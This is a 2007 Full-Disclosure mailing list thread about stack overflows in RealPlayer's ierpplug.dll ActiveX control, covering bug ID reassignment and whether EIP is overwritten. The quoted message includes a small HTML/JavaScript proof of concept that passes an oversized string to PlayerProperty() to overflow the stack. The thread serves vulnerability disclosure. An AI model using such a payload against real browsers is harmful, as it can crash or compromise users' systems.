Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows

Tue, 27 Nov 2007 10:26:59 -0800

Ouch is right.. I know I confused alot of people, I apologize for that. Anyhow, SecurityFocus moved the PlayerProperty() issue from 22811 to its own BID, http://www.securityfocus.com/bid/26586. I have been in contact with Symantec's DeepSight team, and it looks like the Import() function will still throw a stack overflow exception, however it does not appear to overwrite the EIP, making it a plain old DoS attack. I believe they plan to post a write-up on this.

Elazar


-----Original Message-----
From: James Matthews <[EMAIL PROTECTED]>
Sent: Nov 26, 2007 7:24 PM
To: Elazar Broad <[EMAIL PROTECTED]>
Cc: "[email protected]"
Subject: Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows

Ouch!

On Nov 26, 2007 9:15 PM, Elazar Broad <[EMAIL PROTECTED]> wrote:
After some creative Googling, I am revising my original post. I believe that the Import() method overflow that I originally posted is really http://www.securityfocus.com/bid/26130 , although I am not sure why Linux is listed under the "Vulnerable" section, so I am taking it out of the PoC code. Real claims to have patched this back in October, but I can still throw a stack overflow exception via this function using the originally stated version of RealPlayer(which I installed last night). I am now listing this vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX Control PlayerProperty() Method Stack Overflow, and it might be wise to list this under a separate BID. PoC as follows:

-------------
<!--
written by e.b.
-->
<html>
 <head>
 <script language="_javascript_" DEFER>
   function Check() {
   var s = "AAAA";

   while (s.length < 999999) s=s+s;

    var obj = new ActiveXObject(" IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}

     var obj2 = obj.PlayerProperty(s);


  }
 </script>

 </head>
 <body >

 </body>
</html>
-------------

Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



--
http://www.goldwatches.com/coupons/
http://www.jewelerslounge.com 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Reply via email to